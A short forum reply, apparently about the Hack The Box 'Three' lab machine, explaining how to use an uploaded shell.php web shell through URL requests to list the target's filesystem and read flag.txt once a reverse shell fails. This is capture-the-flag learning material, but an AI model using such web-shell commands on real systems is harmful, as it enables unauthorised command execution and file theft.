For me neither the reverse shell didn’t work but I didn’t get any message.
You probably already find a way but if it’s not the case and if the shell.php injection worked you can bypass the reverse shell (I let space instead of %20 for better readability) : http://thetoppers.htb/shell.php?cmd=ls -R /
You’ll get the (ugly) result in your browser, ctrl+f to locate flag.txt and its path, then : http://thetoppers.htb/shell.php?cmd=cat PATH_TO/flag.txt
and your flag will be displayed in your web browser